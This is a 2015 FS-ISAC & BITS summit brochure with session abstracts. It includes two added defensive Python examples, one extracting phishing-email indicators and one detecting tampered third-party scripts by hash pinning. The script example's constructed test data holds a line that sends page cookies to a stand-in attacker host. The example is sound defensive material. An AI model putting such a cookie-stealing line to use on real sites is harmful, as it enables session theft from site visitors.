On behalf of the FS-ISAC, BITS, and the 2015 Annual Summit … · 2015-03-13


On behalf of the FS-ISAC, BITS, and the 2015 Annual Summit Planning Committee, it is my pleasure to invite you to the 2015 FS-ISAC & BITS Annual Summit. Our sector is setting the pace for effective cybersecurity information sharing, and this summit will showcase leading thinking and practices in protecting our sector’s critical infrastructure and our individual institutions. The importance of cybersecurity is not only on the national and world stage, but is maturing as a risk discipline within our organizations. As a result, it is demanding the attention of senior leadership within our institutions, including our CEOs and boards, emphasizing the importance of what we accomplish when coming together for the summit.

You will be hearing from some of the top leaders in financial services and cybersecurity, who will share the latest on Soltra Edge and cyber intelligence, malware mitigation, and security operations, as well as real-world examples of how solutions are being effectively implemented by our members. The summit is focused on providing outstanding content and creating valuable interactions, facilitating both formal and informal information sharing, providing you a truly unique opportunity to learn, collaborate, and contribute. Additionally, this year we are pleased to introduce content tracks around cyber intelligence, awareness training, and payments, delivering an improved way to consume some of our most requested topics.

We are also fortunate to have an outstanding group of sponsors who make the summit possible. Sponsors are our partners, who have been selected based on their content contributions, and who also have their own set of experiences to share and add to best practice development in the industry along with us. I encourage you to spend time with them in the exhibit hall and at other discussion opportunities through the duration of the summit.

Please join us at the 2015 FS-ISAC & BITS Annual Summit, at Loews Miami Beach in Miami Beach, Florida, to expand your peer network, share what has worked for you as a best practice, meet our new members, and hear what CISOs and others are doing to make a positive difference in our respective organizations.

George Smirnoff III
Conference Chairman for the 2015 FS-ISAC & BITS Annual Summit
CISO, Enterprise Technology and Information Risk, Comerica Bank

FS-ISAC Mission Statement

The Financial Services Information Sharing and Analysis Center (FS-ISAC) is a non-profit association comprised of financial institution members that is dedicated to protecting the global financial services sector from physical and cyber threats that impact the resilience, integrity and stability of member institutions through dissemination of trusted and timely information.

Learn more at www.fsisac.com


Who Should Attend?

• CISO, CSO, CIO, CTO, or CRO

• Head of Threat Intelligence

• EVP, SVP, VP, and Director of these areas:

- Security Operations

- Fraud

- Investigations

- Physical Security

- Business Continuity

- Audit & Compliance

- Payment Risk Management

- Payment Operations

• Payment Line of Business Managers including:

- Online Banking

- Online Treasury Management

Why Should You Attend?

• Presentations by over three dozen Senior Executive FS-ISAC members

• Concrete take-aways including case studies and best practices

• Interactive sessions that allow for strategic and solution-oriented discussion

• Complimentary attendance for Premier and above members

- All meals and events during the conference are included

• Actionable information & sharing designed specifically for financial services institutions

Scott Adams
Author & Cartoonist

Scott Adams is the creator of the Dilbert comic strip that runs in over 2,000 newspapers worldwide, on Dilbert.com, and all over the Internet.

Adams is the author of The Dilbert Principle (#1 NYT Best Seller), Dogbert’s Top Secret Management Handbook, The Dilbert Future, Dilbert and the Way of the Weasel, The Joy of Work, God’s Debris, The Religion War, and Stick to Drawing Comics, Monkey-Brain.

Adams has failed at more things than most people have ever tried. He has been a Banker, Software Developer, Hypnotist, CEO of Scott Adams Foods, Owner of two restaurants, Inventor, TV Executive Producer, and an Internet start-up Founder. Those experiences are the backdrop for his newest book on success: How to Fail at Almost Everything and Still Win Big.


Hotel & Travel

Loews Miami Beach Hotel

1601 Collins Avenue
Miami Beach, Florida, 33139
Phone: (305) 604-1601

Reservations

Phone: (888) 879-0462 or (615) 340-5778
www.fsisac-summit.com/spring-hotel-travel

When making your reservation, be sure to mention that you are attending the FS-ISAC and BITS Annual Summit so that you receive FS-ISAC’s discounted group rate of $249 per night. This rate is available until April 24 or once the block is full, so be sure to make your reservation early to avoid disappointment.

Airport and Transportation

Miami International Airport (MIA) - 12.8 mi from hotel
Fort Lauderdale Airport (FLL) - 33.4 mi from hotel

Parking

On-site overnight parking fee: $40.00 USD daily
Garage across street parking fee: $16.00 USD daily

Save 36% to 54% off the registration price!

FS-ISAC Affiliation             Early Bird (before or on 4/17/15)   Standard Registration (after 4/17/15)
Premier/Platinum/Gold Member    FREE                                FREE
Non-Member/CNOP Member          $895                                $1,750
Basic/Core Member               $795                                $1,500
BITS Member                     $795                                $1,250
Standard Member                 $695                                $1,250
Government                      $795                                $795

Registration includes all sessions, meals and events during the conference.

Conference Registration Cancellations

Cancellations are subject to a $50 administrative fee. NO REFUNDS will be made for cancellations received after May 1, 2015. Email [email protected] for more information or to cancel.

PLEASE NOTE The FS-ISAC & BITS Annual Summit restricts attendance to actual practitioners in the financial services space. Security marketing and sales staff, consultants and recruiters cannot attend without sponsoring.

Register Online

www.fsisac-summit.com/attendee-registration2


Silver

Agari, Inc.

Akamai Technologies

Arxan Technologies

BioCatch

Bit9 + Carbon Black

Contrast Security, Inc.

CrowdStrike

CyberArk

DB Networks

Easy Solutions

Flashpoint Partners

Fox-IT

Guardian Analytics

IKANOW

Lastline

Magnus Cloud LLC

NowSecure

Perspecsys

Raytheon Cyber Products

Tanium

Triumfant, Inc.

Waratek

Yubico, Inc.

ZeroFOX

Platinum

Gold


Asymmetric Threats Posed by Transnational Cybercriminal Networks Require Asymmetric Responses: How Leveraging Public/Private Partnerships Can Help Prevent, Detect, Respond and Recover from Criminally Driven Data Breaches | A joint presentation that outlines how financial services sector members can leverage public/private partnerships to help prevent, detect, respond and recover from criminally driven data breaches.

Cybersecurity Information Sharing and Risk Management | This session will feature a noteworthy and valuable discussion of Risk and Information Sharing, and will address the best practices observed in risk management as we interact with the critical infrastructure. Examples will be presented that demonstrate the risk management techniques of acceptance, avoidance, assumption, and transference. The value of information sharing will be addressed using case studies to show how information sharing is valuable to identify, understand, and address threats and vulnerabilities as part of an overall risk management strategy.

Retailers, Payment Processors, and Financial Institutions: Collaborating to Protect Sensitive Customer Data | The maturity of the retail industry will be discussed as it relates to threat intelligence and information sharing, and what best practices it can learn from the financial institutions. The session will also discuss whether retailers will in future be legally obligated to share transaction data with financial institutions, and what role payment processors play in the sharing of threat intelligence.

Securing Tokenized Payments | Card payment data has been stolen by criminals by compromising merchants and payment processors. An encrypted tokenized account number reduces the risk as criminals have yet to materially monetize them. The panel will review token vault technology and how tokenized account numbers are encrypted for processing and provide their views of likely points of attempted compromise of token payments processes. Panelists will discuss the data security techniques to keep the token vault and tokenized payments secure from attacks.

The Changing Cyber Threat Landscape | In this panel discussion, the speaker will provide highlights from iSIGHT Partners Annual Threat Actor Report and discuss trends, predictions and key takeaways in a lively discussion with the expert panel and audience.

Members Technical Forum

A New Way to Secure Your ATMs and Networks | Orrstown Bank’s staff has taken the lessons it learned at JPMorgan and is in the middle of an enterprise roll-out of Splunk across its ATM fleet and all its network devices. Listen to this community bank talk about how it is using a sophisticated set of tools to secure and protect its enterprise network, with specific focus on its ATMs. In this interactive demo, the bank will explain how its solution offers best-in-class protection and builds the foundation for an enterprise-class security/event management system.

Cyber Operation Integration with Soltra Edge | This session introduces a cyber security operations implementation that utilizes FS-ISAC intelligence data. Architecture and implementation details covering Soltra Edge, Splice, and Splunk are described. Full automation from IOC ingestion to response workflow and near-real-time monitoring is highlighted. Also included are the obstacles that were overcome with the help of both the Soltra Edge and Splunk teams, and the remaining issues to be aware of. Finally, some real examples of the alerts and reports are presented.

Exfiltration Framework | Data exfiltration is a common theme in most attack scenarios. The challenge in this space is sufficiently thwarting data exfiltration methods. The Exfiltration Framework is the core building block to understand what data is leaving the network and how it can be slowed down or prevented. The Exfiltration Framework is designed to delay and/or prevent economic loss and strengthen security posture. Components of this framework allow for quick implementations of techniques that can be applied to environments to protect your data. The Data Exfiltration Framework can be used to identify gaps in your network and secure data leaving the network.

Extending the STIX & TAXII Open Ecosystem | The FS-ISAC/DTCC Company - Soltra continues driving down the path of security standards innovation with the release of several “adapters” to widely used open source security tools. In this session, the end-to-end vision of automated community defense will be reviewed and it will be demonstrated how intelligence can move from the FS-ISAC to your controls with STIX & TAXII.

From Data Warehouse to Data Lake for Security Analytics and Metrics Reporting | The talk will focus on Goldman Sachs’ experience building a Hadoop environment to support security analytics over the past four years, including a look at the data sources and analytics that are running in the environment. The talk will also highlight the shift from using relational database technology to the Hadoop environment for metrics reporting, lessons learnt, and how this approach can be applied in other organizations.

Insights from the EU: The Impact of EMV Chip on F2F Fraud and its Meaning to the U.S. | Hear how EMV chip and PCI work together and what the U.S. can learn from the rest of the world about EMV chip. Attend and learn:

• What EMV chip is and how the chip reduces fraud

• What the Council and its standards mean to EMV chip

• What guidance the Council is releasing on EMV chip and PCI DSS, skimming, terminal software security

• How tokenization differs from EMV chip, and how each relates to PCI

• Where to go for information about how to stay secure in an EMV chip environment

Leveraging a Cybersecurity Technology Framework to Align Vendors and Assess Gaps in your Technology Portfolio | We are often inundated with vendors offering their products and services to solve our various information security problems. How can you make sense of the wide range of technologies and ensure that your control gaps are being covered? Where are opportunities for technology disruption? Where are you overly reliant on technology? This session provides a framework for understanding security technologies so that you can align vendors in the right bucket to ensure that you have the suite of technologies that you need to execute your information security mission.

Sharing is Only the Beginning | For the past two years Deutsche Bank has been developing technical intelligence sharing capabilities as well as partnerships within different security communities. Sharing technical intelligence has been a strategic game changer for Deutsche Bank in the way the malware incident response process was implemented, supporting situational awareness and operational granularity. A continuous enrichment lifecycle has been developed for technical intelligence, not only automating some of the key phases of the incident detection to remediation processes, but also allowing preventive and proactive approaches. During this presentation, experience on acquiring, leveraging and sharing technical intelligence will be shared from a global finance institution point of view.

Techniques for Intelligence Management | This presentation addresses the current state of the cyber threatscape and provides recommendations for how security organizations (regardless of size) can effectively and efficiently manage the gathering, storing, accessing, and sharing of threat intelligence for the proactive support of computer network defense (CND). The concept of intelligence automation will be discussed, with a focus on the pros and cons of this type of effort within a security organization.

What Are You Seeing? Trends and Threats 2014 | Translating Financial Threat Data into Intelligence. This talk will provide analysis on the FS-ISAC member submissions for 2014 from the data in the FS-ISAC Intelligence Viewer.

Leadership Development Workshop

Conscious Leadership: A Two-Pronged Approach: How to Elevate your Leadership Style and Develop and Retain Women Leaders | Technical knowledge and skills are no longer enough for leaders to engage and motivate employees to achieve success. Recent studies show that self-awareness among leaders is the strongest predictor of overall success and having more women in leadership roles is correlated with stronger financial returns. Join us to learn what it means to be a Conscious Leader and how to:

• Develop and leverage conscious leadership skills to elevate your personal leadership style

• Strengthen your self-awareness, personal capacity and resilience necessary to flourish in critical roles

• Gain an understanding of how the Leadership Journey program can attract, develop and retain women leaders in your organization

* We apologize to all Affiliate Members, Affiliate Board Advisors, and Sponsors who are not permitted to attend members only and technical forum sessions


Aligning your Security Investments with Today’s Cyber Security Threats: Key Considerations and Practical Advice for a New Kind of Defense | More than 80% of today’s breaches happen at the application level yet the majority of security investments are focused on the network. Runtime Application Self-protection (RASP) is an emerging segment of the market that promises protection for production applications – without changing code. This session will host a panel that will discuss why and how enterprises will adopt this new capability - who will champion the need and how will it affect Security and IT Operations. A Forrester analyst will share some survey statistics that reveal how much risk is at stake and how you can help lead your enterprise to a stronger, more effective security program. A RASP customer will share their expectations of the technology, along with the role of people and processes to protect against ever-evolving cyber security threats. A senior HP Product Manager will share feedback from multiple customer cases: their objectives for using RASP and how they are adding this layer of defense to existing security programs.

A Multi-Pronged Approach to Battle Digital Crimes | This session will discuss the various approaches Visa’s Digital Crimes team takes to battle phishing, as well as social media abuse, rogue mobile abuse, and malware. The areas below will be discussed in greater detail:

• DMARC

• Rogue Mobile App Security

• Social Media Account Security

• Visa’s Most Wanted (a program designed to disrupt the biggest threat actors targeting Visa)

• Visa Champions (a program that focuses on bank partnerships to reduce malware and phishing attacks against their brands)

Anatomy of a Data Breach and Lessons Learned | A community bank was hacked by the “Analyzer” in 2009, and this session’s speaker was hired as CISO to clean house and remediate. This presentation will walk through the lifecycle of the incident, from pre-attack, to attack-in-motion, to post-attack, including corrective actions. This is a real-world scenario of what it means to be attacked and the steps taken during the incident management process. Attendees will learn the survival guide as the incident unfolds and all the remediation work necessary in order to return to safe and sound conditions.

Applying Threat Intelligence to Enhance Existing Security Controls | In this session, panelists will discuss how threat intelligence can relate to what many organizations are already doing. Renowned industry experts will present how this integration can become a valuable resource when applied with existing infrastructure through automation, in turn providing rich context to threats and better visibility without burdening security teams with complexity. Attendees will walk away from the discussion not only with a solid understanding of how threat intelligence can benefit their business but also how they can immediately make use of this information without making changes to their current environment.

A True Intelligence Network | Soltra Edge is evolving from a peer-to-peer communication appliance to a true network platform. Intelligence sharing communities will be further empowered by network services that will both simplify and increase the efficiencies of sharing intelligence. Join this presentation to learn how Soltra will once again change the industry of cyber threat intelligence.

Automated Detection of Insider and Advanced Threats Using Behavioral Security Analytics | Join the presenter, Chief Scientist at Securonix, along with CSOs from companies such as Mass Mutual, ITG and others, as they share how behavioral security analytics, applied to existing data and infrastructure, are used to transform security operations centers into data-driven, signature-less, intelligence-driven operations that deliver prioritized, actionable, rapid detection and response for both insider and advanced threats.

Join this session to learn how the latest in purpose built security and behavior analytics is transforming the way you can approach information security so that security teams can focus on what’s important while leveraging existing technology investments and infrastructure.


Behind the Attack: Examining Current Financial Industry Threats | Understanding the context of attacks against the financial industry is key to developing an effective defensive posture and accurate risk management schema. In this session, the speakers examine representative contemporary threats to understand how effective adversary intelligence can provide context ranging from an understanding of the attack surface, to the tools employed, motivations of the actors, marketplace interactions and consequences of the attack.

Building a Security Operations Center | Building a security operations center (SOC) that defends against cyber threats involves people, process and technology. All three pillars are necessary. Too often one or more are neglected. This presentation will cover best practices in setting up and running a security operations capability. The objective is to provide the audience with a checklist of practices to consider when deciding if a SOC is appropriate as well as deploying and maintaining one.

Case Study: Deutsche Bank, Aetna, & UBS on Third-Party Risk | Three financial institutions – Aetna, Deutsche Bank, and UBS – have determined that by working together, they can engage their software suppliers on the subject of security. In this case study and moderated discussion, leaders from these organizations will present why they chose to work together on this issue, how their joint initiative is progressing, the benefits and drawbacks of their approach, and how you can take advantage of their efforts.

Closing the Cybersecurity Gaps between Merchants and Financial Institutions | Discuss collaborations between FIs and merchants to address cybersecurity and breach issues. Share progress made by the Merchant and Financial Associations Cybersecurity Partnership, a coalition of nearly two dozen associations representing financial services companies and merchants to enhance cybersecurity and to protect consumers. As part of this, discuss how the FS-ISAC and the Retail Cyber Intelligence Sharing Center (R-CISC) worked to establish protocols for sharing information between the financial services sector and the merchant sector.

Cyber Security - The “Hard on the Outside, Soft Inside” Approach is Not Enough | Everyone has become a potential security risk; the motives of threat actors are numerous; all organizations need to assume that they are targets; and, unfortunately, conventional security methods are not enough. The topics to be discussed will be:

• Big Data

• Segmentation

• Strategic Approach to Network Security/Monitoring

• Real-time – Don’t over focus on prevention – pay more attention to detection and response

• Working with other stakeholders, especially the government and your outside counsel

Cyber Threat Alliance: State of the Alliance Update | The Cyber Threat Alliance was formed by a core group of security vendors: Fortinet, McAfee, Palo Alto Networks, and Symantec. The alliance is currently building a STIX compliant framework based on the FS-ISAC model with the goal to directly share information with FS-ISAC.

In this session, one of the alliance’s founding members, Palo Alto Networks, will provide an alliance status update, review the fundamentals of threat intelligence sharing, information sharing best practices, and the future innovations and alliance roadmap. They will review how the alliance utilizes STIX, TAXII, and Cyber Observable Expression (CybOX).

Defending Against Destructive Attacks | Review the latest dimension in cyber attacks, specifically destructive attacks, and their implications for financial organizations. While some of these attacks have been very high profile (Shamoon/Saudi Aramco) and some have targeted financial organizations (DarkSeoul/Jokra), the targets have generally been overseas. With the recent attacks in the news, concern is now rising rapidly within the US as well.

Techniques for defending against these malicious attacks will be discussed, minimizing the damage they cause, and quickly recovering after the attack. Many recommendations are based on the extensive work that has been done to reverse engineer the malware used in recent attacks.


Enabling Customer Channel Innovation through Rapid Security Intelligence and Response | While static controls have their place, cyber threats to financial institutions are better solved through rapid security intelligence collection and response. In doing so, the threat activity is detected in real time and security action is rapidly initiated, matching the dynamic threat with dynamic control capability.

How to Create Collaborative Efficiencies with Third Party Risk Management in Today’s High Risk Environment | In today’s high risk environment—amidst the recent flood of high-profile data breaches and cyber security threats on the rise—doing business in an outsourced economy requires that financial institutions evaluate their service providers’ risks with vigor. Financial institutions need to ensure their service providers’ data management security controls and security practices are rigorously tested, meet regulatory compliance, and are in line with their own data security practices and standards—especially when it comes to how sensitive data is managed, accessed, and used. Attendees will learn about the successful movement toward collaborative onsite assessments by leading financial institutions.

Is Cloud Finally Ready for Wall St? | Other industries have settled on cloud, but in the highly regulated financial services sector, the jury is still out. This session will address the new paradigm of self-enabled IT and look at ways financial institutions are applying existing on-premise controls to the cloud to prevent “Shadow IT” from blindsiding their security measures. The session will provide guidance on how to report the use of cloud to the BoD and investigate how the functionality and cost of encryption and DLP are altering the risk/reward balance of on-prem vs. cloud, tipping the scales to cloud.

Maturing an Intelligence-Driven Community Defense Model | A panel of 4 security professionals, including a cyber intelligence leader, a data analytics specialist, a SOC manager, and one member from outside the FI sharing community, will discuss where we are today with intelligence sharing and automation of the intelligence workflow, both within FS-ISAC and broadly industry wide: which areas of the workflow lifecycle and external sharing are mature, and which are less mature? Where do they expect to see the most improvements and opportunities in the next 6-12 months? Where can sharing communities improve in their efforts to support members?

Modern Threats Require a Modern Identity Based Architecture - Shifting the Standards in Today’s Threat Deterrence | Advanced designs are needed to counter modern day threats and attacks. It’s time to bring forward solutions which address the need for identity-based metadata architectures to create an environment of anomaly deterrence. The speakers will present a modern risk architecture and a powerful, emerging deterrence-based risk solution that others could follow. The architectures and solutions being shared are currently in play at Aetna, and are based on research through Carnegie Mellon’s CERT Insider Threat program. They will share a compelling way to shift the standards through which information security controls can be implemented and measured.

New Tactical and Strategic Challenges for the Financial CISO | Cybercriminals are upping their game, investing time and effort both in new tactical tools and in changing strategies to overcome security hurdles. In this session, the speakers will dive into several examples of how cybercriminals are changing and morphing their tactics using malware, social engineering techniques and by learning from other cybercriminals. They will also look into important changes in the technology world, geo-political landscape and different data breaches that all affect the financial CISO’s approach to securing the organization.

Preparation Through Realistic Threat Scenario Design | This interactive session will guide the audience through the creation of a realistic cyber threat scenario. The session will provide best practice guidance, tools and techniques to select a scenario, design a fictional threat actor, and add details for their exercise participants.

Expertise: BAC has a robust exercise program, designing over 20 cyber exercises each year.

Timeliness: The financial sector is under increased regulatory pressure to demonstrate preparation for cyber attacks. Cyber Exercises help demonstrate preparation.

Uniqueness: A common complaint in an exercise is the lack of realism or believability. This session provides best practice guidance to build realism.

Protecting Your Brand From Email-based Fraud | Currently, the DMARC specification is table stakes for blocking all domain-based email threats, but there has been an exponential increase in cousin-domain threats over the last few years as fraudsters become more sophisticated. An integrated, multi-layered strategy to reduce the impact of email fraud is becoming more necessary for Fin-Serv security executives. Return Path’s Rob Holmes will talk about the importance of DMARC implementation, as well as new emerging solutions, including browser blocking, anti-virus blocking, predictive data analysis, and corporate inbound filtering, that will help financial institutions combat new threats, protect their brand and ultimately protect their customers.

Rebuilding a Security Team (Building a Great Security Operations Capability) | Many CISOs/CSOs and Directors of Security Operations are facing the challenge of increased expectations, misplaced assumptions of responsibility and limited resources to deliver success. This leads to increased frustration within the security teams who are striving to protect the organizations. The speaker has been brought in multiple times to rebuild IT security organizations, turning them into respected and valued teams.

This presentation will show how the speaker has been able to change the delivery model of the IT security teams, improving morale and efficiency, while at the same time regaining the respect of other teams within the organizations.

Reverse Engineering Emails for Threat Indicators | Although enterprises receive high volumes of phishing emails daily, many still lack the ability to analyze them effectively. Reverse engineering lets companies quickly answer questions about the phishing emails they receive. This session will detail reverse engineering techniques that show how to parse and pivot on the metadata within an email (sender and reply addresses, relay path, URLs, attachments), use custom signatures to detect malicious logic, and gain general visibility into phishing campaigns. These techniques yield answers to questions such as “Have the bad guys ever used this domain against us?” and let organizations respond proactively to phishing attacks.
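What "parse and pivot" looks like in practice, as an added example written for this page (not code from the brochure or the session's speakers): the raw message, the indicator store and the single custom signature are all constructed; the IPs are from documentation ranges and the domains are fictitious.

```python
"""Added example; not code from the summit brochure or the session speakers.

Parses a phishing email into pivotable indicators (sender domains, relay
IPs, URLs and their hosts, attachment names and SHA-256 hashes), runs a
custom signature over them, and checks each indicator against a prior-
sightings store to answer "have the bad guys used this against us before?".
RAW_EMAIL and PRIOR_SIGHTINGS are constructed for this example.
"""
import email
import hashlib
import re
from email import policy
from email.utils import getaddresses
from urllib.parse import urlsplit

RAW_EMAIL = """\
Return-Path: <bounce@examp1ebank.com>
Received: from mx.examp1ebank.com (mx.examp1ebank.com [203.0.113.45])
        by mail.victim.example (Postfix) with ESMTP id 4F2A1
        for <payments@victim.example>; Mon, 13 Apr 2015 09:12:31 -0400
Received: from [198.51.100.7] (unknown [198.51.100.7])
        by mx.examp1ebank.com with ESMTPA; Mon, 13 Apr 2015 09:12:02 -0400
From: "Example Bank Security" <alerts@examp1ebank.com>
Reply-To: verify@examplebank-secure.com
To: payments@victim.example
Subject: Action required: verify wire transfer
Message-ID: <20150413131202.GA1337@examp1ebank.com>
Date: Mon, 13 Apr 2015 09:12:02 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please confirm the transfer at http://secure-examplebank.com.evil.example/login
or review the attached statement.
--b1
Content-Type: application/octet-stream; name="statement.pdf.exe"
Content-Disposition: attachment; filename="statement.pdf.exe"
Content-Transfer-Encoding: base64

bm90IGEgcmVhbCBiaW5hcnk=
--b1--
"""

# Constructed prior-sightings store: indicator -> earlier incident tickets.
PRIOR_SIGHTINGS = {
    "examp1ebank.com": ["INC-2015-0042"],
    "203.0.113.45": ["INC-2015-0042", "INC-2015-0051"],
}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Custom signature: a document-looking name carrying an executable extension.
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.(exe|scr|js|vbs|bat)$", re.I)


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].strip("<>").lower()


def extract_indicators(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    ind = {"domains": set(), "ips": set(), "urls": set(), "attachments": []}

    # Identities the mail claims: header From, envelope sender, reply target.
    for header in ("From", "Return-Path", "Reply-To", "Sender"):
        for _, addr in getaddresses(msg.get_all(header, [])):
            if "@" in addr:
                ind["domains"].add(domain_of(addr))
    message_id = str(msg.get("Message-ID", ""))
    if "@" in message_id:
        ind["domains"].add(domain_of(message_id))

    # Relay path: every IP in every Received header, oldest hop included.
    for received in msg.get_all("Received", []):
        ind["ips"].update(IP_RE.findall(str(received)))

    # Body URLs and their hosts; attachments by name and content hash.
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            payload = part.get_payload(decode=True) or b""
            ind["attachments"].append(
                (part.get_filename(), hashlib.sha256(payload).hexdigest()))
        elif part.get_content_type() == "text/plain":
            for url in URL_RE.findall(part.get_content()):
                ind["urls"].add(url)
                host = urlsplit(url).hostname
                if host:
                    ind["domains"].add(host.lower())
    return ind


def signature_hits(ind: dict) -> list:
    """Apply custom signatures to the extracted indicators."""
    return [f"double-extension attachment: {name}"
            for name, _ in ind["attachments"] if name and DOUBLE_EXT_RE.search(name)]


def pivot(ind: dict, store: dict) -> dict:
    """Which of this email's indicators have we seen before, and where?"""
    seen = ind["domains"] | ind["ips"] | ind["urls"]
    seen.update(h for _, h in ind["attachments"])
    return {i: store[i] for i in sorted(seen) if i in store}


if __name__ == "__main__":
    indicators = extract_indicators(RAW_EMAIL)
    for key in ("domains", "ips", "urls", "attachments"):
        print(key, sorted(indicators[key]))
    print("signatures:", signature_hits(indicators))
    print("prior sightings:", pivot(indicators, PRIOR_SIGHTINGS))
```

The pivot is deliberately dumb (exact match on a dict) so the point stays visible: once indicators are normalised at extraction time, "have we seen this before" is a lookup, and the same extraction feeds whatever store, SIEM or sharing platform the organization actually uses.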

Secure Payment Doesn’t Have to be an Oxymoron | A discussion of the rapid evolution of payment form factors versus emerging attack vectors, with expert perspectives on next-generation security practices and risk mitigation. Attendees will gain up-to-the-minute awareness of issues and opportunities, tactical best practices at the institution level, and the strategic developments rolling out in the very near future from the industry’s central organizations.

Securing Apple Pay Payments | Apple Pay brings new security technology to the processing of card payments. Token account numbers, substitutes for the real card number, are stored in a mobile wallet on the Apple smartphone. The token account number is encrypted for NFC radio transmission and payment processing. Card issuers will need to review their authentication and enrollment processes to prevent stolen account numbers from being tokenized and then stored in a smartphone.

Security Awareness Challenge | Securing the human is critical to securing an organization. In this peer-sharing session, members share their Security Awareness material: the message, materials, posters, give-aways, games, etc.

Security Awareness - Going Above and Beyond the Traditional Approach | When you think of Security Awareness, do you think of annual training focused on the same repetitive content? Do people shuffle through training doing the minimum necessary to pass the class and get back to work?

This session focuses on a comprehensive, holistic approach to Security Awareness that includes:

• Advertising engagement methods for Information Security

• Advocating, consulting and reporting on risk mitigation and remediation

• Enabling the business to evangelize Security Best Practices

• Innovative communication to engage the user community

• Testing and measuring the impact of the awareness program

• Using metrics to shape the awareness program

• Showcasing Information Security Program Value


Security Awareness — If Only We Could Beat It into Them | Between bad guys phishing our employees and users circumventing supposedly idiot-proof technical controls, we all know how important security awareness is. During this presentation, the speakers discuss what makes a good security awareness program, how to overcome silos and office politics to pool resources for increasing user awareness, and case studies from failed and successful programs they have built for Fortune 500, global, and other organizations. They’ll also discuss ways to make security more meaningful and engaging for your end users. You’ll leave with a step-by-step plan to build or improve your security awareness program and a collection of low-cost, creative resources.

Security Executives Teaming with Board of Directors When Addressing Business Risk | As organizations increasingly rely on technology to manage their operations and transact business, it is clear that digital and IT risk has become business risk and needs to be managed as such. Recent high-profile breaches have made clear to corporate boards that this is a core responsibility. More CISOs and CIROs than ever are being called upon to discuss current cyber threats and risks to their businesses. Join us as a panel of senior financial sector CISOs, joined by RSA’s Chief Trust Officer, discuss their approaches to working with executive leadership and corporate boards, and the key elements of successfully presenting often arcane risks in an understandable business context.

Shields UP Community Banks!!!: a Cyber Defense Strategy for Community Banks | A round-table discussion on the threats, vulnerabilities and attack vectors that a large population of community banks are exposed to, and how IT staff at community banks are responding to these threats alongside their regular IT jobs. CSBS has invited several InfoSec leaders from community banks across the nation to join this discussion on how they are tackling the threats today and what they are doing to protect and defend themselves.

The New Cyber Cold War and Your Company Is the Target | Your company’s information systems are the targets. The old Cold War is over; the new one has already given us Estonia, Georgia, Stuxnet, Saudi Aramco, South Korea, U.S. banks, Sands Corporation, and Sony. Anyone with a grievance can get into this game and cause destruction and damage. This is the new cyber conflict: it qualifies as a use of force but remains below the “war” threshold. How do we move forward? What laws and policies apply? What is the Administration’s “Cyber Monroe Doctrine” that lets the world, and our companies, know when the U.S. will defend against cyber threats and attacks?

The Threat You Aren’t Prepared For - Hacked 3rd Party Code Libraries | Cybercriminals, hacktivists and hostile nation-states now have a new way to target your organization: compromising the JavaScript libraries your sites load. 2014 saw two major incidents, the Syrian Electronic Army attacking more than 100 major websites, and jQuery suffering a breach that left its libraries vulnerable for a week. Code libraries are under attack, which means the code webmasters rely on to run their sites can itself become the point of compromise. The speakers will review third-party code risk, share examples of breaches, and discuss how security teams can monitor for and manage the inherent risk in using these libraries.
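One concrete way to "monitor for" this class of compromise is to record a hash of each third-party script when it is reviewed and alert whenever the served bytes change. The block below is an added example written for this page, not code from the brochure or the session's speakers; it emits the hash in the browser's Subresource Integrity format so the same value can be pinned in the script tag. The library contents and URLs are constructed stand-ins and nothing is fetched from the network.

```python
"""Added example; not code from the summit brochure or the session speakers.

Monitoring third-party script risk by hash pinning: record a hash of each
library when it is vetted, re-hash what is currently served, and report
anything changed, unpinned or missing. The hash uses the Subresource
Integrity (SRI) format so the browser can enforce the same pin.
All library bodies and URLs below are constructed for this example.
"""
import base64
import hashlib

JQUERY_URL = "https://cdn.example/jquery-1.11.1.min.js"
ANALYTICS_URL = "https://cdn.example/analytics.js"
WIDGET_URL = "https://cdn.example/widget.js"

# Constructed: the bytes the team reviewed and approved for each library.
VETTED_LIBRARIES = {
    JQUERY_URL: b"/*! jQuery v1.11.1 (constructed stand-in) */ window.jQuery = {};",
    ANALYTICS_URL: b"/* analytics stub (constructed) */ window.track = function () {};",
}

# Constructed: what a later monitoring run fetched from the same URLs.
SERVED_NOW = {
    JQUERY_URL: VETTED_LIBRARIES[JQUERY_URL],
    # Same file with a trailing line appended: the kind of edit a CDN
    # compromise would make (constructed, does nothing here).
    ANALYTICS_URL: VETTED_LIBRARIES[ANALYTICS_URL]
    + b"new Image().src='https://collector.evil.example/?c='+document.cookie;",
    WIDGET_URL: b"/* never reviewed */",
}


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """SRI integrity value: '<alg>-<base64 digest>', usable in integrity=..."""
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def record_pins(libraries: dict) -> dict:
    """Run once at review time; keep the result under version control."""
    return {url: sri_hash(body) for url, body in libraries.items()}


def check_pins(served: dict, pins: dict) -> dict:
    """Compare currently served bytes with the recorded pins.
    Returns url -> 'OK' | 'CHANGED' | 'UNPINNED' | 'MISSING'."""
    status = {}
    for url, body in served.items():
        if url not in pins:
            status[url] = "UNPINNED"   # loaded by the site but never reviewed
        elif sri_hash(body) == pins[url]:
            status[url] = "OK"
        else:
            status[url] = "CHANGED"    # re-review before trusting again
    for url in pins:
        if url not in served:
            status[url] = "MISSING"    # pinned resource no longer served
    return status


def script_tag(url: str, pin: str) -> str:
    """The tag a page would carry so the browser enforces the same pin."""
    return f'<script src="{url}" integrity="{pin}" crossorigin="anonymous"></script>'


if __name__ == "__main__":
    pins = record_pins(VETTED_LIBRARIES)
    for url, result in check_pins(SERVED_NOW, pins).items():
        print(f"{result:9} {url}")
    print(script_tag(JQUERY_URL, pins[JQUERY_URL]))
```

The server-side check catches a change within one monitoring interval; the integrity attribute makes the browser refuse the altered file immediately, at the cost of having to update the pin every time the library is legitimately upgraded, which is the discipline the session is arguing for.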

